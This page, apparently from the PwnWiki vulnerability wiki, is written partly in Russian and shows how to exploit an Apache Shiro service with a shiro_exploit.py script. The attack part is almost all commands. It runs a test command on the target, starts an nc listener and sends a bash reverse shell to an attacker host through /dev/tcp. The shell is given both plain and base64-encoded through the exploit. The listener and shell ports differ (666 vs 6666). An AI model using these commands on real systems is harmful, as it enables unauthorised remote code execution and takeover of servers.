免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Эксплуатация уязвимостей
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"
Команда была выполнена успешно.
Getshell
Слушатель выполняет следующие команды:
nc -lvp 666
Машина-жертва выполняет следующую команду:
bash -i >& /dev/tcp/192.168.2.130/6666 0>&1 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
免费、自由、人人可编辑的漏洞库--PwnWiki.com